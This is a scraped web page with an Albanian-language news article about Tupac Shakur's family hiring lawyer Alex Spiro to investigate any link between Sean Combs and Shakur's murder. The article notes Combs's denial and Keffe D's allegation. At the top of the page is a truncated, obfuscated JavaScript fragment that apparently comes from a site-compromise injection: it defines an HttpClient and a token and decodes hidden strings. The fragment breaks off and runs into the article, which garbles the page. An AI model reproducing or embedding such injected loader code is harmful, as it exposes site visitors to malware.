;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Diddy urdhëroi vrasjen e Tupac? Familja e Shakur nis hetimet!

By

Familja e Tupac Shakur ka punësuar avokatin Alex Spiro, për të hetuar çdo lidhje të mundshme midis Sean Combs dhe vrasjes së Shakurit, ka konfirmuar Rolling Stone. Lajmi pason raportimet se familja e reperit të ndjerë nga Los Angeles ka punësuar një ekip hetuesish për të përcaktuar nëse themeluesi i Bad Boy Entertainment kishte ndonjë përfshirje në vdekjen e tij.

Combs ka mohuar me forcë çdo përfshirje në të kaluarën.

Shakur 25-vjeçar u qëllua për vdekje në një të shtëna me makinë në Las Vegas në shtator 1996. Vrasja e tij ka mbetur e pazbardhur, por çështja erdhi në shtator 2023 kur anëtari i bandës së Compton Crips, Duane Keith “Keffe D” Davis u arrestua dhe u akuzua për vrasjen e Shakur.

Davis – i cili shkon në gjyq në mars 2025 – ka pretenduar se Combs ofroi 1 milion dollarë për Shakur.

Në shtator, Combs u arrestua dhe u akuzua për mashtrim, trafik seksual dhe transport për t’u përfshirë në prostitucion, gati një vit pasi ish e dashura e tij Casandra “Cassie” Ventura ngriti një padi kundër manjatit për abuzim seksual.

Spiro është një nga avokatët kryesorë në Hollywood, duke përfaqësuar persona si Megan Thee Stallion, Jay-Z dhe Elon Musk. Çështja e tij më e fundit e profilit të lartë përfundoi me fitore kur një gjykatës i New Mexico hodhi poshtë akuzat për vrasje të pavullnetshme kundër aktorit Alec Baldwin.

Artikuj të ngjashëm